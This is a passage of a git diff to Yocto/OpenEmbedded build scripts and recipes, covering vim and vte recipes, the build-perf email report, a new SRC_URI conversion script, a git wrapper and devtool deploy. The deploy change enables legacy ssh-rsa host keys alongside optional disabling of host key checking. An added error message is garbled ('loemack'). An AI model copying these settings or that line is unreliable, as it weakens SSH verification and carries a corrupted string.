47 for LOCALE in cs fr ko pl sk zh_CN zh_TW;do
48 echo -n > src/po/${LOCALE}.po
49 done
50 autotools_do_compile
51}
52
53#Available PACKAGECONFIG options are gtkgui, acl, x11, tiny
54PACKAGECONFIG ??= ""
55PACKAGECONFIG += " \
56 ${@bb.utils.filter('DISTRO_FEATURES', 'acl selinux', d)} \ 58 ${@bb.utils.filter('DISTRO_FEATURES', 'acl selinux', d)} \
57 ${@bb.utils.contains('DISTRO_FEATURES', 'x11', 'x11 gtkgui', '', d)} \ 59 ${@bb.utils.contains('DISTRO_FEATURES', 'x11', 'x11 gtkgui', '', d)} \
60 nls \
58" 61"
59 62
60PACKAGECONFIG[gtkgui] = "--enable-gui=gtk3,--enable-gui=no,gtk+3" 63PACKAGECONFIG[gtkgui] = "--enable-gui=gtk3,--enable-gui=no,gtk+3"
@@ -63,6 +66,7 @@ PACKAGECONFIG[x11] = "--with-x,--without-x,xt,"
63PACKAGECONFIG[tiny] = "--with-features=tiny,--with-features=big,," 66PACKAGECONFIG[tiny] = "--with-features=tiny,--with-features=big,,"
64PACKAGECONFIG[selinux] = "--enable-selinux,--disable-selinux,libselinux," 67PACKAGECONFIG[selinux] = "--enable-selinux,--disable-selinux,libselinux,"
65PACKAGECONFIG[elfutils] = "--enable-elf-check,,elfutils," 68PACKAGECONFIG[elfutils] = "--enable-elf-check,,elfutils,"
69PACKAGECONFIG[nls] = "--enable-nls,--disable-nls,,"
66 70
67EXTRA_OECONF = " \ 71EXTRA_OECONF = " \
68 --disable-gpm \ 72 --disable-gpm \
@@ -71,6 +75,7 @@ EXTRA_OECONF = " \
71 --disable-netbeans \ 75 --disable-netbeans \
72 --disable-desktop-database-update \ 76 --disable-desktop-database-update \
73 --with-tlib=ncurses \ 77 --with-tlib=ncurses \
78 --with-modified-by='${MAINTAINER}' \
74 ac_cv_small_wchar_t=no \ 79 ac_cv_small_wchar_t=no \
75 ac_cv_path_GLIB_COMPILE_RESOURCES=no \ 80 ac_cv_path_GLIB_COMPILE_RESOURCES=no \
76 vim_cv_getcwd_broken=no \ 81 vim_cv_getcwd_broken=no \
@@ -83,6 +88,11 @@ EXTRA_OECONF = " \
83 STRIP=/bin/true \ 88 STRIP=/bin/true \
84" 89"
85 90
91# Some host distros don't have it, disable consistently
92# also disable on dunfell target builds
93EXTRA_OECONF_append_class-native = " vim_cv_timer_create=no"
94EXTRA_OECONF_append_class-target = " vim_cv_timer_create=no"
95
86do_install() { 96do_install() {
87 autotools_do_install 97 autotools_do_install
88 98
diff --git a/meta/recipes-support/vim/vim_8.2.bb b/meta/recipes-support/vim/vim_9.0.bb
index 709b6ddb55..709b6ddb55 100644
--- a/meta/recipes-support/vim/vim_8.2.bb
+++ b/meta/recipes-support/vim/vim_9.0.bb
diff --git a/meta/recipes-support/vte/vte_0.58.3.bb b/meta/recipes-support/vte/vte_0.58.3.bb
index 41dc2e77c9..50724700e8 100644
--- a/meta/recipes-support/vte/vte_0.58.3.bb
+++ b/meta/recipes-support/vte/vte_0.58.3.bb
@@ -1,4 +1,6 @@
1SUMMARY = "Virtual terminal emulator GTK+ widget library" 1SUMMARY = "Virtual terminal emulator GTK+ widget library"
2DESCRIPTION = "VTE provides a virtual terminal widget for GTK applications."
3HOMEPAGE = "https://wiki.gnome.org/Apps/Terminal/VTE"
2BUGTRACKER = "https://bugzilla.gnome.org/buglist.cgi?product=vte" 4BUGTRACKER = "https://bugzilla.gnome.org/buglist.cgi?product=vte"
3LICENSE = "GPLv3 & LGPLv3+ & LGPLv2.1+" 5LICENSE = "GPLv3 & LGPLv3+ & LGPLv2.1+"
4LICENSE_libvte = "LGPLv3+" 6LICENSE_libvte = "LGPLv3+"
diff --git a/scripts/bitbake-whatchanged b/scripts/bitbake-whatchanged
index 3095dafa46..6f4b268119 100755
--- a/scripts/bitbake-whatchanged
+++ b/scripts/bitbake-whatchanged
@@ -217,7 +217,7 @@ print what will be done between the current and last builds, for example:
217 # Edit the recipes 217 # Edit the recipes
218 $ bitbake-whatchanged core-image-sato 218 $ bitbake-whatchanged core-image-sato
219 219
220The changes will be printed" 220The changes will be printed.
221 221
222Note: 222Note:
223 The amount of tasks is not accurate when the task is "do_build" since 223 The amount of tasks is not accurate when the task is "do_build" since
diff --git a/scripts/buildhistory-diff b/scripts/buildhistory-diff
index 833f7c33a5..02eedafd6e 100755
--- a/scripts/buildhistory-diff
+++ b/scripts/buildhistory-diff
@@ -11,7 +11,6 @@
11import sys 11import sys
12import os 12import os
13import argparse 13import argparse
14from distutils.version import LooseVersion
15 14
16# Ensure PythonGit is installed (buildhistory_analysis needs it) 15# Ensure PythonGit is installed (buildhistory_analysis needs it)
17try: 16try:
@@ -71,10 +70,6 @@ def main():
71 parser = get_args_parser() 70 parser = get_args_parser()
72 args = parser.parse_args() 71 args = parser.parse_args()
73 72
74 if LooseVersion(git.__version__) < '0.3.1':
75 sys.stderr.write("Version of GitPython is too old, please install GitPython (python-git) 0.3.1 or later in order to use this script\n")
76 sys.exit(1)
77
78 if len(args.revisions) > 2: 73 if len(args.revisions) > 2:
79 sys.stderr.write('Invalid argument(s) specified: %s\n\n' % ' '.join(args.revisions[2:])) 74 sys.stderr.write('Invalid argument(s) specified: %s\n\n' % ' '.join(args.revisions[2:]))
80 parser.print_help() 75 parser.print_help()
diff --git a/scripts/contrib/build-perf-test-wrapper.sh b/scripts/contrib/build-perf-test-wrapper.sh
index fa71d4a2e9..0a85e6e708 100755
--- a/scripts/contrib/build-perf-test-wrapper.sh
+++ b/scripts/contrib/build-perf-test-wrapper.sh
@@ -87,21 +87,10 @@ if [ $# -ne 0 ]; then
87 exit 1 87 exit 1
88fi 88fi
89 89
90if [ -n "$email_to" ]; then
91 if ! [ -x "$(command -v phantomjs)" ]; then
92 echo "ERROR: Sending email needs phantomjs."
93 exit 1
94 fi
95 if ! [ -x "$(command -v optipng)" ]; then
96 echo "ERROR: Sending email needs optipng."
97 exit 1
98 fi
99fi
100
101# Open a file descriptor for flock and acquire lock 90# Open a file descriptor for flock and acquire lock
102LOCK_FILE="/tmp/oe-build-perf-test-wrapper.lock" 91LOCK_FILE="/tmp/oe-build-perf-test-wrapper.lock"
103if ! exec 3> "$LOCK_FILE"; then 92if ! exec 3> "$LOCK_FILE"; then
104 echo "ERROR: Unable to open lock file" 93 echo "ERROR: Unable to open loemack file"
105 exit 1 94 exit 1
106fi 95fi
107if ! flock -n 3; then 96if ! flock -n 3; then
@@ -226,7 +215,7 @@ if [ -n "$results_repo" ]; then
226 if [ -n "$email_to" ]; then 215 if [ -n "$email_to" ]; then
227 echo "Emailing test report" 216 echo "Emailing test report"
228 os_name=`get_os_release_var PRETTY_NAME` 217 os_name=`get_os_release_var PRETTY_NAME`
229 "$script_dir"/oe-build-perf-report-email.py --to "$email_to" --subject "Build Perf Test Report for $os_name" --text $report_txt --html $report_html "${OE_BUILD_PERF_REPORT_EMAIL_EXTRA_ARGS[@]}" 218 "$script_dir"/oe-build-perf-report-email.py --to "$email_to" --subject "Build Perf Test Report for $os_name" --text $report_txt "${OE_BUILD_PERF_REPORT_EMAIL_EXTRA_ARGS[@]}"
230 fi 219 fi
231 220
232 # Upload report files, unless we're on detached head 221 # Upload report files, unless we're on detached head
diff --git a/scripts/contrib/convert-srcuri.py b/scripts/contrib/convert-srcuri.py
new file mode 100755
index 0000000000..5b362ea2e8
--- /dev/null
+++ b/scripts/contrib/convert-srcuri.py
@@ -0,0 +1,77 @@
1#!/usr/bin/env python3
2#
3# Conversion script to update SRC_URI to add branch to git urls
4#
5# Copyright (C) 2021 Richard Purdie
6#
7# SPDX-License-Identifier: GPL-2.0-only
8#
9
10import re
11import os
12import sys
13import tempfile
14import shutil
15import mimetypes
16
17if len(sys.argv) < 2:
18 print("Please specify a directory to run the conversion script against.")
19 sys.exit(1)
20
21def processfile(fn):
22 def matchline(line):
23 if "MIRROR" in line or ".*" in line or "GNOME_GIT" in line:
24 return False
25 return True
26 print("processing file '%s'" % fn)
27 try:
28 if "distro_alias.inc" in fn or "linux-yocto-custom.bb" in fn:
29 return
30 fh, abs_path = tempfile.mkstemp()
31 modified = False
32 with os.fdopen(fh, 'w') as new_file:
33 with open(fn, "r") as old_file:
34 for line in old_file:
35 if ("git://" in line or "gitsm://" in line) and "branch=" not in line and matchline(line):
36 if line.endswith('"\n'):
37 line = line.replace('"\n', ';branch=master"\n')
38 elif line.endswith(" \\\n"):
39 line = line.replace(' \\\n', ';branch=master \\\n')
40 modified = True
41 if ("git://" in line or "gitsm://" in line) and "github.com" in line and "protocol=https" not in line and matchline(line):
42 if "protocol=git" in line:
43 line = line.replace('protocol=git', 'protocol=https')
44 elif line.endswith('"\n'):
45 line = line.replace('"\n', ';protocol=https"\n')
46 elif line.endswith(" \\\n"):
47 line = line.replace(' \\\n', ';protocol=https \\\n')
48 modified = True
49 new_file.write(line)
50 if modified:
51 shutil.copymode(fn, abs_path)
52 os.remove(fn)
53 shutil.move(abs_path, fn)
54 except UnicodeDecodeError:
55 pass
56
57ourname = os.path.basename(sys.argv[0])
58ourversion = "0.1"
59
60if os.path.isfile(sys.argv[1]):
61 processfile(sys.argv[1])
62 sys.exit(0)
63
64for targetdir in sys.argv[1:]:
65 print("processing directory '%s'" % targetdir)
66 for root, dirs, files in os.walk(targetdir):
67 for name in files:
68 if name == ourname:
69 continue
70 fn = os.path.join(root, name)
71 if os.path.islink(fn):
72 continue
73 if "/.git/" in fn or fn.endswith(".html") or fn.endswith(".patch") or fn.endswith(".m4") or fn.endswith(".diff"):
74 continue
75 processfile(fn)
76
77print("All files processed with version %s" % ourversion)
diff --git a/scripts/contrib/documentation-audit.sh b/scripts/contrib/documentation-audit.sh
index 1191f57a8e..f436f9bae0 100755
--- a/scripts/contrib/documentation-audit.sh
+++ b/scripts/contrib/documentation-audit.sh
@@ -27,7 +27,7 @@ fi
27 27
28echo "REMINDER: you need to build for MACHINE=qemux86 or you won't get useful results" 28echo "REMINDER: you need to build for MACHINE=qemux86 or you won't get useful results"
29echo "REMINDER: you need to set LICENSE_FLAGS_WHITELIST appropriately in local.conf or " 29echo "REMINDER: you need to set LICENSE_FLAGS_WHITELIST appropriately in local.conf or "
30echo " you'll get false positives. For example, LICENSE_FLAGS_WHITELIST = \"Commercial\"" 30echo " you'll get false positives. For example, LICENSE_FLAGS_WHITELIST = \"commercial\""
31 31
32for pkg in `bitbake -s | awk '{ print \$1 }'`; do 32for pkg in `bitbake -s | awk '{ print \$1 }'`; do
33 if [[ "$pkg" == "Loading" || "$pkg" == "Loaded" || 33 if [[ "$pkg" == "Loading" || "$pkg" == "Loaded" ||
diff --git a/scripts/contrib/oe-build-perf-report-email.py b/scripts/contrib/oe-build-perf-report-email.py
index de3862c897..7192113c28 100755
--- a/scripts/contrib/oe-build-perf-report-email.py
+++ b/scripts/contrib/oe-build-perf-report-email.py
@@ -19,8 +19,6 @@ import socket
19import subprocess 19import subprocess
20import sys 20import sys
21import tempfile 21import tempfile
22from email.mime.image import MIMEImage
23from email.mime.multipart import MIMEMultipart
24from email.mime.text import MIMEText 22from email.mime.text import MIMEText
25 23
26 24
@@ -29,30 +27,6 @@ logging.basicConfig(level=logging.INFO, format="%(levelname)s: %(message)s")
29log = logging.getLogger('oe-build-perf-report') 27log = logging.getLogger('oe-build-perf-report')
30 28
31 29
32# Find js scaper script
33SCRAPE_JS = os.path.join(os.path.dirname(__file__), '..', 'lib', 'build_perf',
34 'scrape-html-report.js')
35if not os.path.isfile(SCRAPE_JS):
36 log.error("Unableto find oe-build-perf-report-scrape.js")
37 sys.exit(1)
38
39
40class ReportError(Exception):
41 """Local errors"""
42 pass
43
44
45def check_utils():
46 """Check that all needed utils are installed in the system"""
47 missing = []
48 for cmd in ('phantomjs', 'optipng'):
49 if not shutil.which(cmd):
50 missing.append(cmd)
51 if missing:
52 log.error("The following tools are missing: %s", ' '.join(missing))
53 sys.exit(1)
54
55
56def parse_args(argv): 30def parse_args(argv):
57 """Parse command line arguments""" 31 """Parse command line arguments"""
58 description = """Email build perf test report""" 32 description = """Email build perf test report"""
@@ -77,137 +51,19 @@ def parse_args(argv):
77 "the email parts") 51 "the email parts")
78 parser.add_argument('--text', 52 parser.add_argument('--text',
79 help="Plain text message") 53 help="Plain text message")
80 parser.add_argument('--html',
81 help="HTML peport generated by oe-build-perf-report")
82 parser.add_argument('--phantomjs-args', action='append',
83 help="Extra command line arguments passed to PhantomJS")
84 54
85 args = parser.parse_args(argv) 55 args = parser.parse_args(argv)
86 56
87 if not args.html and not args.text: 57 if not args.text:
88 parser.error("Please specify --html and/or --text") 58 parser.error("Please specify --text")
89 59
90 return args 60 return args
91 61
92 62
93def decode_png(infile, outfile): 63def send_email(text_fn, subject, recipients, copy=[], blind_copy=[]):
94 """Parse/decode/optimize png data from a html element"""
95 with open(infile) as f:
96 raw_data = f.read()
97
98 # Grab raw base64 data
99 b64_data = re.sub('^.*href="data:image/png;base64,', '', raw_data, 1)
100 b64_data = re.sub('">.+$', '', b64_data, 1)
101
102 # Replace file with proper decoded png
103 with open(outfile, 'wb') as f:
104 f.write(base64.b64decode(b64_data))
105
106 subprocess.check_output(['optipng', outfile], stderr=subprocess.STDOUT)
107
108
109def mangle_html_report(infile, outfile, pngs):
110 """Mangle html file into a email compatible format"""
111 paste = True
112 png_dir = os.path.dirname(outfile)
113 with open(infile) as f_in:
114 with open(outfile, 'w') as f_out:
115 for line in f_in.readlines():
116 stripped = line.strip()
117 # Strip out scripts
118 if stripped == '<!--START-OF-SCRIPTS-->':
119 paste = False
120 elif stripped == '<!--END-OF-SCRIPTS-->':
121 paste = True
122 elif paste:
123 if re.match('^.+href="data:image/png;base64', stripped):
124 # Strip out encoded pngs (as they're huge in size)
125 continue
126 elif 'www.gstatic.com' in stripped:
127 # HACK: drop references to external static pages
128 continue
129
130 # Replace charts with <img> elements
131 match = re.match('<div id="(?P<id>\w+)"', stripped)
132 if match and match.group('id') in pngs:
133 f_out.write('<img src="cid:{}"\n'.format(match.group('id')))
134 else:
135 f_out.write(line)
136
137
138def scrape_html_report(report, outdir, phantomjs_extra_args=None):
139 """Scrape html report into a format sendable by email"""
140 tmpdir = tempfile.mkdtemp(dir='.')
141 log.debug("Using tmpdir %s for phantomjs output", tmpdir)
142
143 if not os.path.isdir(outdir):
144 os.mkdir(outdir)
145 if os.path.splitext(report)[1] not in ('.html', '.htm'):
146 raise ReportError("Invalid file extension for report, needs to be "
147 "'.html' or '.htm'")
148
149 try:
150 log.info("Scraping HTML report with PhangomJS")
151 extra_args = phantomjs_extra_args if phantomjs_extra_args else []
152 subprocess.check_output(['phantomjs', '--debug=true'] + extra_args +
153 [SCRAPE_JS, report, tmpdir],
154 stderr=subprocess.STDOUT)
155
156 pngs = []
157 images = []
158 for fname in os.listdir(tmpdir):
159 base, ext = os.path.splitext(fname)
160 if ext == '.png':
161 log.debug("Decoding %s", fname)
162 decode_png(os.path.join(tmpdir, fname),
163 os.path.join(outdir, fname))
164 pngs.append(base)
165 images.append(fname)
166 elif ext in ('.html', '.htm'):
167 report_file = fname
168 else:
169 log.warning("Unknown file extension: '%s'", ext)
170 #shutil.move(os.path.join(tmpdir, fname), outdir)
171
172 log.debug("Mangling html report file %s", report_file)
173 mangle_html_report(os.path.join(tmpdir, report_file),
174 os.path.join(outdir, report_file), pngs)
175 return (os.path.join(outdir, report_file),
176 [os.path.join(outdir, i) for i in images])
177 finally:
178 shutil.rmtree(tmpdir)
179
180def send_email(text_fn, html_fn, image_fns, subject, recipients, copy=[],
181 blind_copy=[]):
182 """Send email"""
183 # Generate email message 64 # Generate email message
184 text_msg = html_msg = None 65 with open(text_fn) as f:
185 if text_fn: 66 msg = MIMEText("Yocto build performance test report.\n" + f.read(), 'plain')
186 with open(text_fn) as f:
187 text_msg = MIMEText("Yocto build performance test report.\n" +
188 f.read(), 'plain')
189 if html_fn:
190 html_msg = msg = MIMEMultipart('related')
191 with open(html_fn) as f:
192 html_msg.attach(MIMEText(f.read(), 'html'))
193 for img_fn in image_fns:
194 # Expect that content id is same as the filename
195 cid = os.path.splitext(os.path.basename(img_fn))[0]
196 with open(img_fn, 'rb') as f:
197 image_msg = MIMEImage(f.read())
198 image_msg['Content-ID'] = '<{}>'.format(cid)
199 html_msg.attach(image_msg)
200
201 if text_msg and html_msg:
202 msg = MIMEMultipart('alternative')
203 msg.attach(text_msg)
204 msg.attach(html_msg)
205 elif text_msg:
206 msg = text_msg
207 elif html_msg:
208 msg = html_msg
209 else:
210 raise ReportError("Neither plain text nor html body specified")
211 67
212 pw_data = pwd.getpwuid(os.getuid()) 68 pw_data = pwd.getpwuid(os.getuid())
213 full_name = pw_data.pw_gecos.split(',')[0] 69 full_name = pw_data.pw_gecos.split(',')[0]
@@ -234,8 +90,6 @@ def main(argv=None):
234 if args.debug: 90 if args.debug:
235 log.setLevel(logging.DEBUG) 91 log.setLevel(logging.DEBUG)
236 92
237 check_utils()
238
239 if args.outdir: 93 if args.outdir:
240 outdir = args.outdir 94 outdir = args.outdir
241 if not os.path.exists(outdir): 95 if not os.path.exists(outdir):
@@ -245,25 +99,16 @@ def main(argv=None):
245 99
246 try: 100 try:
247 log.debug("Storing email parts in %s", outdir) 101 log.debug("Storing email parts in %s", outdir)
248 html_report = images = None
249 if args.html:
250 html_report, images = scrape_html_report(args.html, outdir,
251 args.phantomjs_args)
252
253 if args.to: 102 if args.to:
254 log.info("Sending email to %s", ', '.join(args.to)) 103 log.info("Sending email to %s", ', '.join(args.to))
255 if args.cc: 104 if args.cc:
256 log.info("Copying to %s", ', '.join(args.cc)) 105 log.info("Copying to %s", ', '.join(args.cc))
257 if args.bcc: 106 if args.bcc:
258 log.info("Blind copying to %s", ', '.join(args.bcc)) 107 log.info("Blind copying to %s", ', '.join(args.bcc))
259 send_email(args.text, html_report, images, args.subject, 108 send_email(args.text, args.subject, args.to, args.cc, args.bcc)
260 args.to, args.cc, args.bcc)
261 except subprocess.CalledProcessError as err: 109 except subprocess.CalledProcessError as err:
262 log.error("%s, with output:\n%s", str(err), err.output.decode()) 110 log.error("%s, with output:\n%s", str(err), err.output.decode())
263 return 1 111 return 1
264 except ReportError as err:
265 log.error(err)
266 return 1
267 finally: 112 finally:
268 if not args.outdir: 113 if not args.outdir:
269 log.debug("Wiping %s", outdir) 114 log.debug("Wiping %s", outdir)
diff --git a/scripts/create-pull-request b/scripts/create-pull-request
index 8eefcf63a5..2f91a355b0 100755
--- a/scripts/create-pull-request
+++ b/scripts/create-pull-request
@@ -128,7 +128,7 @@ PROTO_RE="[a-z][a-z+]*://"
128GIT_RE="\(^\($PROTO_RE\)\?\)\($USER_RE@\)\?\([^:/]*\)[:/]\(.*\)" 128GIT_RE="\(^\($PROTO_RE\)\?\)\($USER_RE@\)\?\([^:/]*\)[:/]\(.*\)"
129REMOTE_URL=${REMOTE_URL%.git} 129REMOTE_URL=${REMOTE_URL%.git}
130REMOTE_REPO=$(echo $REMOTE_URL | sed "s#$GIT_RE#\5#") 130REMOTE_REPO=$(echo $REMOTE_URL | sed "s#$GIT_RE#\5#")
131REMOTE_URL=$(echo $REMOTE_URL | sed "s#$GIT_RE#git://\4/\5#") 131REMOTE_URL=$(echo $REMOTE_URL | sed "s#$GIT_RE#https://\4/\5#")
132 132
133if [ -z "$BRANCH" ]; then 133if [ -z "$BRANCH" ]; then
134 BRANCH=$(git branch | grep -e "^\* " | cut -d' ' -f2) 134 BRANCH=$(git branch | grep -e "^\* " | cut -d' ' -f2)
diff --git a/scripts/git b/scripts/git
new file mode 100755
index 0000000000..644055e540
--- /dev/null
+++ b/scripts/git
@@ -0,0 +1,26 @@
1#!/usr/bin/env python3
2#
3# Wrapper around 'git' that doesn't think we are root
4
5import os
6import shutil
7import sys
8
9os.environ['PSEUDO_UNLOAD'] = '1'
10
11# calculate path to the real 'git'
12path = os.environ['PATH']
13# we need to remove our path but also any other copy of this script which
14# may be present, e.g. eSDK.
15replacements = [os.path.dirname(sys.argv[0])]
16for p in path.split(":"):
17 if p.endswith("/scripts"):
18 replacements.append(p)
19for r in replacements:
20 path = path.replace(r, '/ignoreme')
21real_git = shutil.which('git', path=path)
22
23if len(sys.argv) == 1:
24 os.execl(real_git, 'git')
25
26os.execv(real_git, sys.argv)
diff --git a/scripts/lib/buildstats.py b/scripts/lib/buildstats.py
index c69b5bf4d7..3b76286ba5 100644
--- a/scripts/lib/buildstats.py
+++ b/scripts/lib/buildstats.py
@@ -8,7 +8,7 @@ import json
8import logging 8import logging
9import os 9import os
10import re 10import re
11from collections import namedtuple,OrderedDict 11from collections import namedtuple
12from statistics import mean 12from statistics import mean
13 13
14 14
@@ -238,7 +238,7 @@ class BuildStats(dict):
238 subdirs = os.listdir(path) 238 subdirs = os.listdir(path)
239 for dirname in subdirs: 239 for dirname in subdirs:
240 recipe_dir = os.path.join(path, dirname) 240 recipe_dir = os.path.join(path, dirname)
241 if not os.path.isdir(recipe_dir): 241 if dirname == "reduced_proc_pressure" or not os.path.isdir(recipe_dir):
242 continue 242 continue
243 name, epoch, version, revision = cls.split_nevr(dirname) 243 name, epoch, version, revision = cls.split_nevr(dirname)
244 bsrecipe = BSRecipe(name, epoch, version, revision) 244 bsrecipe = BSRecipe(name, epoch, version, revision)
diff --git a/scripts/lib/checklayer/__init__.py b/scripts/lib/checklayer/__init__.py
index fe545607bb..e69a10f452 100644
--- a/scripts/lib/checklayer/__init__.py
+++ b/scripts/lib/checklayer/__init__.py
@@ -146,7 +146,7 @@ def detect_layers(layer_directories, no_auto):
146 146
147 return layers 147 return layers
148 148
149def _find_layer_depends(depend, layers): 149def _find_layer(depend, layers):
150 for layer in layers: 150 for layer in layers:
151 if 'collections' not in layer: 151 if 'collections' not in layer:
152 continue 152 continue
@@ -156,7 +156,7 @@ def _find_layer_depends(depend, layers):
156 return layer 156 return layer
157 return None 157 return None
158 158
159def add_layer_dependencies(bblayersconf, layer, layers, logger): 159def get_layer_dependencies(layer, layers, logger):
160 def recurse_dependencies(depends, layer, layers, logger, ret = []): 160 def recurse_dependencies(depends, layer, layers, logger, ret = []):
161 logger.debug('Processing dependencies %s for layer %s.' % \ 161 logger.debug('Processing dependencies %s for layer %s.' % \
162 (depends, layer['name'])) 162 (depends, layer['name']))
@@ -166,7 +166,7 @@ def add_layer_dependencies(bblayersconf, layer, layers, logger):
166 if depend == 'core': 166 if depend == 'core':
167 continue 167 continue
168 168
169 layer_depend = _find_layer_depends(depend, layers) 169 layer_depend = _find_layer(depend, layers)
170 if not layer_depend: 170 if not layer_depend:
171 logger.error('Layer %s depends on %s and isn\'t found.' % \ 171 logger.error('Layer %s depends on %s and isn\'t found.' % \
172 (layer['name'], depend)) 172 (layer['name'], depend))
@@ -203,6 +203,11 @@ def add_layer_dependencies(bblayersconf, layer, layers, logger):
203 layer_depends = recurse_dependencies(depends, layer, layers, logger, layer_depends) 203 layer_depends = recurse_dependencies(depends, layer, layers, logger, layer_depends)
204 204
205 # Note: [] (empty) is allowed, None is not! 205 # Note: [] (empty) is allowed, None is not!
206 return layer_depends
207
208def add_layer_dependencies(bblayersconf, layer, layers, logger):
209
210 layer_depends = get_layer_dependencies(layer, layers, logger)
206 if layer_depends is None: 211 if layer_depends is None:
207 return False 212 return False
208 else: 213 else:
diff --git a/scripts/lib/checklayer/cases/common.py b/scripts/lib/checklayer/cases/common.py
index b82304e361..4495f71b24 100644
--- a/scripts/lib/checklayer/cases/common.py
+++ b/scripts/lib/checklayer/cases/common.py
@@ -14,7 +14,7 @@ class CommonCheckLayer(OECheckLayerTestCase):
14 # The top-level README file may have a suffix (like README.rst or README.txt). 14 # The top-level README file may have a suffix (like README.rst or README.txt).
15 readme_files = glob.glob(os.path.join(self.tc.layer['path'], '[Rr][Ee][Aa][Dd][Mm][Ee]*')) 15 readme_files = glob.glob(os.path.join(self.tc.layer['path'], '[Rr][Ee][Aa][Dd][Mm][Ee]*'))
16 self.assertTrue(len(readme_files) > 0, 16 self.assertTrue(len(readme_files) > 0,
17 msg="Layer doesn't contains README file.") 17 msg="Layer doesn't contain a README file.")
18 18
19 # There might be more than one file matching the file pattern above 19 # There might be more than one file matching the file pattern above
20 # (for example, README.rst and README-COPYING.rst). The one with the shortest 20 # (for example, README.rst and README-COPYING.rst). The one with the shortest
diff --git a/scripts/lib/devtool/deploy.py b/scripts/lib/devtool/deploy.py
index aaa25dda08..b4f9fbfe45 100644
--- a/scripts/lib/devtool/deploy.py
+++ b/scripts/lib/devtool/deploy.py
@@ -168,9 +168,9 @@ def deploy(args, config, basepath, workspace):
168 if args.strip and not args.dry_run: 168 if args.strip and not args.dry_run:
169 # Fakeroot copy to new destination 169 # Fakeroot copy to new destination
170 srcdir = recipe_outdir 170 srcdir = recipe_outdir
171 recipe_outdir = os.path.join(rd.getVar('WORKDIR'), 'deploy-target-stripped') 171 recipe_outdir = os.path.join(rd.getVar('WORKDIR'), 'devtool-deploy-target-stripped')
172 if os.path.isdir(recipe_outdir): 172 if os.path.isdir(recipe_outdir):
173 bb.utils.remove(recipe_outdir, True) 173 exec_fakeroot(rd, "rm -rf %s" % recipe_outdir, shell=True)
174 exec_fakeroot(rd, "cp -af %s %s" % (os.path.join(srcdir, '.'), recipe_outdir), shell=True) 174 exec_fakeroot(rd, "cp -af %s %s" % (os.path.join(srcdir, '.'), recipe_outdir), shell=True)
175 os.environ['PATH'] = ':'.join([os.environ['PATH'], rd.getVar('PATH') or '']) 175 os.environ['PATH'] = ':'.join([os.environ['PATH'], rd.getVar('PATH') or ''])
176 oe.package.strip_execs(args.recipename, recipe_outdir, rd.getVar('STRIP'), rd.getVar('libdir'), 176 oe.package.strip_execs(args.recipename, recipe_outdir, rd.getVar('STRIP'), rd.getVar('libdir'),
@@ -201,9 +201,9 @@ def deploy(args, config, basepath, workspace):
201 print(' %s' % item) 201 print(' %s' % item)
202 return 0 202 return 0
203 203
204 extraoptions = '' 204 extraoptions = '-o HostKeyAlgorithms=+ssh-rsa'
205 if args.no_host_check: 205 if args.no_host_check:
206 extraoptions += '-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no' 206 extraoptions += ' -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no'
207 if not args.show_status: 207 if not args.show_status:
208 extraoptions += ' -q' 208 extraoptions += ' -q'
209 209
@@ -274,9 +274,9 @@ def undeploy(args, config, basepath, workspace):
274 elif not args.recipename and not args.all: 274 elif not args.recipename and not args.all:
275 raise argparse_oe.ArgumentUsageError('If you don\'t specify a recipe, you must specify -a/--all', 'undeploy-target') 275 raise argparse_oe.ArgumentUsageError('If you don\'t specify a recipe, you must specify -a/--all', 'undeploy-target')
276 276
277 extraoptions = '' 277 extraoptions = '-o HostKeyAlgorithms=+ssh-rsa'
278 if args.no_host_check: 278 if args.no_host_check:
279 extraoptions += '-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no' 279 extraoptions += ' -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no'
280 if not args.show_status: 280 if not args.show_status:
281 extraoptions += ' -q' 281 extraoptions += ' -q'
282 282
diff --git a/scripts/lib/devtool/menuconfig.py b/scripts/lib/devtool/menuconfig.py
index 95384c5333..ff9227035d 100644
--- a/scripts/lib/devtool/menuconfig.py
+++ b/scripts/lib/devtool/menuconfig.py
@@ -43,7 +43,7 @@ def menuconfig(args, config, basepath, workspace):
43 return 1 43 return 1
44 44
45 check_workspace_recipe(workspace, args.component) 45 check_workspace_recipe(workspace, args.component)
46 pn = rd.getVar('PN', True) 46 pn = rd.getVar('PN')
47 47
48 if not rd.getVarFlag('do_menuconfig','task'): 48 if not rd.getVarFlag('do_menuconfig','task'):
49 raise DevtoolError("This recipe does not support menuconfig option") 49 raise DevtoolError("This recipe does not support menuconfig option")
diff --git a/scripts/lib/devtool/standard.py b/scripts/lib/devtool/standard.py
index 7b62b7e7b8..cfa88616af 100644
--- a/scripts/lib/devtool/standard.py
+++ b/scripts/lib/devtool/standard.py
@@ -357,7 +357,7 @@ def _move_file(src, dst, dry_run_outdir=None, base_outdir=None):
357 bb.utils.mkdirhier(dst_d) 357 bb.utils.mkdirhier(dst_d)
358 shutil.move(src, dst) 358 shutil.move(src, dst)
359 359
360def _copy_file(src, dst, dry_run_outdir=None): 360def _copy_file(src, dst, dry_run_outdir=None, base_outdir=None):
361 """Copy a file. Creates all the directory components of destination path.""" 361 """Copy a file. Creates all the directory components of destination path."""
362 dry_run_suffix = ' (dry-run)' if dry_run_outdir else '' 362 dry_run_suffix = ' (dry-run)' if dry_run_outdir else ''
363 logger.debug('Copying %s to %s%s' % (src, dst, dry_run_suffix)) 363 logger.debug('Copying %s to %s%s' % (src, dst, dry_run_suffix))
@@ -953,12 +953,17 @@ def modify(args, config, basepath, workspace):
953 953
954 if bb.data.inherits_class('kernel', rd): 954 if bb.data.inherits_class('kernel', rd):
955 f.write('SRCTREECOVEREDTASKS = "do_validate_branches do_kernel_checkout ' 955 f.write('SRCTREECOVEREDTASKS = "do_validate_branches do_kernel_checkout '
956 'do_fetch do_unpack do_kernel_configme do_kernel_configcheck"\n') 956 'do_fetch do_unpack do_kernel_configcheck"\n')
957 f.write('\ndo_patch[noexec] = "1"\n') 957 f.write('\ndo_patch[noexec] = "1"\n')
958 f.write('\ndo_configure_append() {\n' 958 f.write('\ndo_configure_append() {\n'
959 ' cp ${B}/.config ${S}/.config.baseline\n' 959 ' cp ${B}/.config ${S}/.config.baseline\n'
960 ' ln -sfT ${B}/.config ${S}/.config.new\n' 960 ' ln -sfT ${B}/.config ${S}/.config.new\n'
961 '}\n') 961 '}\n')
962 f.write('\ndo_kernel_configme_prepend() {\n'
963 ' if [ -e ${S}/.config ]; then\n'
